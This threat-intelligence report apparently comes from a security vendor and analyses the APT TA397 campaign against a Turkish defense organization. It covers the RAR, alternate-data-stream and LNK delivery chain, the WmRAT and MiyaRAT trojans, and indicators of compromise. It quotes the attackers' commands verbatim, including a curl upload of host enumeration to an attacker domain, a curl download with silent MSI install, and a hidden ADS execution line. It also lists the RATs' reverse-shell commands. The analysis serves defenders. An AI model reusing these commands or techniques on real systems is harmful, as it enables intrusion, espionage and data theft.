Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage RATs

Summary :

Proofpoint has identified APT TA397 targeting a Turkish defense organization using a spearphishing attack related to Madagascar’s public infrastructure. The attack involved a RAR archive delivering a malicious LNK file that created a scheduled task to download further malware, including WmRAT and MiyaRAT, for intelligence gathering. #APT #CyberSecurity #Malware

Keypoints :

  • TA397 targeted a Turkish defense sector organization using a spearphishing lure about Madagascar.
  • The attack utilized RAR archives, LNK files, and NTFS alternate data streams for malware delivery.
  • WmRAT and MiyaRAT were deployed for intelligence gathering and exfiltration.
  • Proofpoint assesses the campaign supports a South Asian government’s interests.

MITRE Techniques :

  • T1203: Exploitation for Client Execution – Spearphishing email with malicious attachment.
  • T1053: Scheduled Task/Job – Creation of scheduled tasks to maintain persistence.
  • T1045: Software Packing – Use of RAR archives to obfuscate malware delivery.
  • T1071: Application Layer Protocol – Communication with C2 servers using HTTP.

Indicator of Compromise :

  • [file hash] 53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1
  • [file hash] f6c77098906f5634789d7fd7ff294bfd95325d69f1be96be1ee49ff161e07733
  • [file hash] 10cec5a84943f9b0c635640fad93fd2a2469cc46aae5e43a4604c903d139970f
  • [file hash] c7ab300df27ad41f8d9e52e2d732f95479f4212a3c3d62dbf0511b37b3e81317
  • [domain] academymusica[.]com
  • [domain] samsnewlooker[.]com
  • [domain] jacknwoods[.]com
  • [ip address] 38.180.142.228
  • [ip address] 96.9.215.155

Key findings 

Proofpoint observed advanced persistent threat (APT) TA397 targeting a Turkish defense sector organization with a lure about public infrastructure projects in Madagascar.  
The attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads.  
TA397 was observed manually delivering WmRAT and MiyaRAT malware families in the final stages of this attack chain. Both malware families are designed to enable intelligence gathering and exfiltration.  
Proofpoint assesses TA397 campaigns are almost certainly intelligence collection efforts in support of a South Asian government’s interests. 

Overview 

On November 18, 2024, TA397 (also known by third-party researchers as Bitter) targeted a defense sector organization in Turkey with a spearphishing lure. The email included a compressed archive (RAR) file attachment containing a decoy PDF (~tmp.pdf) file detailing a World Bank public initiative in Madagascar for infrastructure development, a shortcut (LNK) file masquerading as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk), and an Alternate Data Stream (ADS) file that contained PowerShell code.  

The lure contained the subject “PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR” which closely matched the LNK file name masquerading as a PDF within the RAR archive: “PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk”. This subject line theme is very common for TA397, as the majority of the organizations they target are either in the public sector or receive public investments and is indicative of the targeted nature of their campaigns.  

The usage of RAR archives is a staple tactic of TA397 payload delivery. Throughout the first half of 2024, Proofpoint has observed TA397 utilizing Microsoft Compiled Help Files (CHM) files within RAR archives as a means of creating scheduled tasks on target machines.  

This blog post details TA397’s usage of NTFS alternate data streams (ADS) in combination with PDF and LNK files to gain persistence, which facilitates the deployment of further malware. This research also looks at the continued usage of wmRAT by TA397, the recently discovered MiyaRAT – a contemporary addition to the threat actor’s arsenal – and the associated infrastructure of TA397.  

Infection chain 

The spearphishing email originated from a compromised email account belonging to a government organization and contained a RAR archive with a variety of artifacts inside. Alongside the LNK file, was a “~tmp.pdf” file and two NTFS alternate data streams (ADS), one titled “Participation” and the other a “Zone.Identifier”.  

Illustration of the TA397 infection chain.  

When opening the RAR file, the target would only see the LNK file as the ADS streams are hidden from the user when using Windows’ built in RAR extraction utility, or WinRAR. Further, the PDF had the attribute Hidden, System & Files ready for archiving (HSA) enabled so the user is lured to believe that a PDF file is being opened due to the extension pdf.lnk. By default, Windows hides the real extension of a file. However, if the RAR is opened in 7-Zip, the user can view and extract the NTFS ADS streams on Windows systems (NTFS file formatted system): 

7-Zip view on 53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1.  

ADS streams are a feature of the NTFS file system in Windows that allows users to attach data streams to a file. There are certain archive formats and software that allow ADS streams to be included into the archive container along with the file. The archive format used in this attack chain is RAR v5 which allows the storage of NTFS ADS streams.  

The Zone.Identifier stream is an ADS introduced in older Windows versions as a security feature. It stores information about the origin of a file, such as the URL Security Zone (e.g., Zone 3 for the internet) to determine if the file is trustworthy. Files downloaded via browsers automatically receive this stream. Additionally, when files are extracted from a downloaded archive using Windows Explorer, the extracted files inherit a Zone.Identifier stream with a ReferrerUrl pointing to the original archive. A Zone.Identifier ADS is very common and is not required for the success of this attack chain, nevertheless it can provide useful information for forensic analysis.  

The Zone.Identifier ADS contains information about the origin of the “~tmp.pdf” file, and can be seen below: 

Screenshot of the PDF Zone.Identifier details.  

The “~tmp.pdf” file is a legitimate PDF downloaded from the World Bank organization, detailing an infrastructure project about paved roads in Madagascar. This can be seen in the following screenshot: 

Legitimate PDF used as a decoy document in the campaign. 

The second ADS is the “Participation” ADS. Inside the “Participation” stream was a base64 encoded PowerShell blob: 

Base64 encoded PowerShell from “Participation”.  

The LNK ran the following conhost command: 

–headless cmd /k “cmd < ~tmp.pdf:Participation & exit”

This caused the ~tmp.pdf file to run the base64 encoded PowerShell contained within the “Participation” ADS stream which decoded to the following command: 

Decoded PowerShell command. 

This PowerShell command opened the PDF lure file which displayed the World Bank decoy document to the user, and the command then set up a scheduled task named “DsSvcCleanup”. This scheduled task attempted to send target host information (username and computer name) with the curl utility every 17 minutes to the domain jacknwoods[.]com. This URI structure is used regularly by TA397. Upon successful retrieval of a payload, the downloaded file is launched with a command prompt. The task will continue to run even if a payload is dropped to the victim machine.

These requests were structured as follows:

GET hxxp[:]//jacknwoods[.]com/jacds[.]php?jin=%computername%_%username%
Host: jacknwoods[.]com
User-Agent: curl/7.55.1
Accept: */*

Proofpoint observed TA397 operators respond to these requests with manual commands approximately 12 hours after the first scheduled task request, deploying two distinct payloads and a third command that enumerated the target machine and issues a POST request containing that information.  

First, we observed this response from the attacker server:

First payload observed.  

This command downloads and runs the “anvrsa.msi” file on the target machine which installs the WmRAT file “anvrsa.exe”.  
 
TA397 issued further commands once they determined there was no successful communication from WmRAT. Shortly after, Proofpoint observed TA397 issuing the following commands to enumerate the target machine:  

cd C:programdata
dir >> abc[.]pdf
tasklist >> abc[.]pdf
wmic /namespace:rootSecurityCenter2 path AntiVirusProduct get displayName >> abc[.]pdf
cmd /c curl -X POST -F “file=[@]C:programdataabc[.]pdf”
hxxps[:]//www[.]jacknwoods[.]com/chthuo[.]php?ain=%computername%_%username% 
del abc[.]pdf 

This series of commands shows TA397 enumerating the ProgramData directory, listing currently running processes, and using the Windows command line utility (WMIC) to identify any antivirus products running on the target machine, and exfiltrating that data in a file to a different endpoint on the jacknwoods[.]com domain. A very similar set of commands was previously observed and attributed to TA397 and published by StrikeReady Labs. 
 
Following that, Proofpoint researchers observed TA397 dropping another payload by downloading and running “gfxview.msi”:  

curl -o C:userspublicmusicgfxview[.]msi
http://jacknwoods[.]com/gfxview[.]msi
msiexec /i C:userspublicmusicgfxview.msi /qn /norestart

This acted as the dropper to install “xrgtg.exe” which was the MiyaRAT payload. WmRAT and MiyaRAT were first identified by QiAnXin Threat Intelligence Center. Below is Proofpoint’s detailed analysis of WmRAT and MiyaRAT.  

WmRAT 

WmRAT is a remote access trojan (RAT) written in C++ that uses sockets for communications and has standard RAT functionality. The RAT can gather basic host information, upload or download files, take screenshots, get geolocation data of the target machine, enumerate directories and files, and run arbitrary commands via cmd or PowerShell. The malware also generates a number of junk threads, potentially to mislead researchers or responders investigating the samples. 

The malware starts by copying timezone information from calling GetDynamicTimeZoneInformation. Rather than any unique or interesting sleep techniques, this malware uses the classic method of directly calling Sleep. This is done throughout the malware at various stages as well as having a dedicated function serving the purpose of just initiating a long sleep.  

The sample then creates a thread which gathers some basic host information: 

Username 
Hostname 
The list of logical drives for the host 

While this information is gathered, nothing is done with it and this process is repeated 1,000 times. Most likely this is just to fill up behavior logs or create copious amounts of noise within the environment.   

Malware gathering basic disk information.  

Soon after creating this thread, another thread is created that executes the same exact function gathering the same information.  

With the threads created, the malware begins attempts to communicate with the C2. In the samples observed by Proofpoint at this stage a socket has not been initialized yet, so these specific communications fail. Although later in the execution the socket is initialized properly, so it will indeed be able to communicate with the C2 after that point.  The malware decrypts the C2 server address academymusica[.]com by taking each character from an encrypted blob and subtracting 0x25 from it.  

Decrpytion of server address academymusica[.]com.

This subtraction cipher is how all string decryption is done for the malware. Each character has a set value added or subtracted from it, resulting in the expected output. Generally when malware sends command identifiers or data identifiers to the C2, its done in plaintext or is some numeric value. But in the case of this malware, it sends seemingly random values as identifiers. Like the “*****” below.  

Cleartext string of asterisks.  

Assuming all the junk threads have started, the malware does a connectivity check by making a request to microsoft[.]com. After this, the socket is finally initialized to connect to the C2 decrypted earlier in the program. This is set to communicate with a hardcoded port, which in this sample is set to 47408. 

Hardcoded port initialization.  

The socket receives a 4-byte value from the C2, swapping the endianness, and passing that to the command handler which indicates the ordinal value of the command to execute.  

Invocation of the command handler, after socket initialization.

As far as supported commands, these are some of the most notable ones: 

8: read and exfil file 
9: create host summary  
12: exit infection 
13: receive data from the C2, and write to file stream 
15: receive and decrypt filepath from C2,  
19: take screenshot and exfil 
21: get geolocation information 
22: get file listing from given directory and gather file create/modification time 
24: get disk size for files and directories 
26: mini command handler 
27: exec string in cmd or powershell, or restart self 
31: exit 

MiyaRAT 

MiyaRAT is also written in C++ and contains similar functionality to WmRAT. The malware starts by decrypting its hardcoded C2 server. This domain is decoded by taking the encoded value and subtracting the matching character in the string “doobiedoodooziezzz” from it.  

Decoding C2 server samsnewlooker[.]com.  

Doing this results in the C2 domain samsnewlooker[.]com. Along with this, the sample has as hardcoded port value set as a string which determines which port the implant connects to. Strangely the malware then runs its own implementation of Mersenne twister, which is a common random number generator implementation, which is used to generate values to sleep for a designated period of time.  

With the C2 decoded, a global socket is then created with the hardcoded port of 56189.  

Socket creation with hardcoded port 56189.  

After the socket is initialized, MiyaRAT gathers basic system information which is sent in the first communication to the C2.  

Basic information gathered to send to the threat actor.  

One of the final fields sent within the initial communication is the version of the malware, in this case being 3.  

Malware version information.  

This data is then encrypted by XORing each byte of the data with 0x43. An example of the entire set of data sent to the C2 can be seen below.  

“` 

C:–3  [106.07/238.47] GB FREE 
|<username>|<hostname>|C:WindowscnstallerMScCA69.tmp|C:Users<user>|10.0 125 19044|3.0| 

“` 

The C2 can respond commands that MiyaRAT supports: 

GDIR – get directory tree 
DELz – remove directory/file 
GFS – enumerate all files from a specific directory 
SH1start_cmd – reverse shell using CMD 
SH1start_ps – reverse shell using PowerShell 
SH1 – interact with reverse shell 
SFS – connect to new socket to upload and download files via UPL/DWNL 
GSS – take screenshot and exfil  
SH1exit_client – close infection 
SH2 – interact with reverse shell 

Network analysis 

TA397’s infrastructure usage throughout this campaign is divided between the implant domains and the staging domains. The jacknwoods[.]com domain acted as their staging domain to distribute WmRAT and MiyaRAT, and academymusica[.]com and samsnewlooker[.]com as C2 domains for each implant.  

The staging domain jacknwoods[.]com resolved to 185.244.151[.]84, registered with a Let’s Encrypt certificate with GoDaddy as a provider. Proofpoint has observed this combination of domain registration patterns in several previous TA397 campaigns when deploying staging infrastructure. The IP is multi-tenanted, and not controlled by TA397.  

The WmRAT C2 academymusica[.]com resolved to 38.180.142[.]228 at the time of analysis, while theMiyaRAT C2  samsnewlooker[.]comresolved to 96.9.215[.]155. Proofpoint assesses it is likely these two IPs are attacker-owned infrastructure.   

Attribution 

Whilst this blog has revealed an interesting evolution of TTPs in TA397’s capability set; this activity still demonstrates signature markers of behavior Proofpoint have observed from TA397 historically: 

The usage of RAR archives to deliver a payload that creates a scheduled task on target machines, with a command line structure that seldom changes.  
The infrastructure and hosting providers in use bears similarities to historical TA397 infrastructure.  
Targeting organizations in the defense sector in the EMEA and APAC regions. 
Across observed campaigns, activity consistently falls within the working hours of UTC+5:30. Proofpoint has observed the manual deployment of TA397 malware multiple times across different campaigns that align with the working hours of this timezone.  
Both RATs analyzed in this blog have been historically attributed to TA397 (wmRAT and MiyaRAT respectively), and Proofpoint concurs with this assessment.  

Proofpoint assesses WmRAT and MiyaRAT are two distinct malware families in active, operational use by TA397. We believe it is a realistic possibility that both families were written by the same developer(s). It is also clear that MiyaRAT is the newer of the two tools in their arsenal. Proofpoint assesses MiyaRAT may be reserved for targets TA397 deems high value due to the observed sporadic deployment of the malware in only a certain number of campaigns.  

Based on Proofpoint’s analysis of the characteristics of the observed campaign, previously observed lure content, historical targeting, time-based analysis of TA397 campaigns, and a review of industry reporting on activity associated to Bitter, Proofpoint researchers assess these campaigns are almost certainly intelligence collection efforts in support of a South Asian government’s interests.  

Why it matters 

TA397 is a prominent South-Asian nexus, espionage-focused APT that frequently and consistently targets government, energy, telecommunications, defense and engineering organizations throughout the EMEA and APAC regions. They persistently utilize scheduled tasks to communicate with their staging domains to deploy malicious backdoors into target organizations, for the purpose of gaining access to privileged information and intellectual property.  
 
This blog provides defenders with the knowledge and tools necessary to identify and defend against intrusions from TA397. 

YARA / ET sigs 

YARA signature available here. 

2058192 – ET MALWARE TA397/Bitter Requesting Next Stage Payload

IOCs 

Indicator 

Type 

First Observed 

Description 

53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1 

SHA256 

2024-11-18 

RAR 

f6c77098906f5634789d7fd7ff294bfd95325d69f1be96be1ee49ff161e07733 

SHA256 

2024-11-18 

LNK 

10cec5a84943f9b0c635640fad93fd2a2469cc46aae5e43a4604c903d139970f  

SHA256 

2024-09-23 

wmRAT  

c7ab300df27ad41f8d9e52e2d732f95479f4212a3c3d62dbf0511b37b3e81317 

SHA256 

2024-10-12 

MiyaRAT  

academymusica[.]com 

Domain 

2024-11-06 

C2 

samsnewlooker[.]com 

Domain 

2024-09-25 

C2 

jacknwoods[.]com  

Domain  

2024-11-07 

Staging Domain 

38.180.142[.]228 

IP 

2024-11-06 

C2 

96.9.215[.]155 

IP 

2024-09-25 

C2 


Full Research: https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats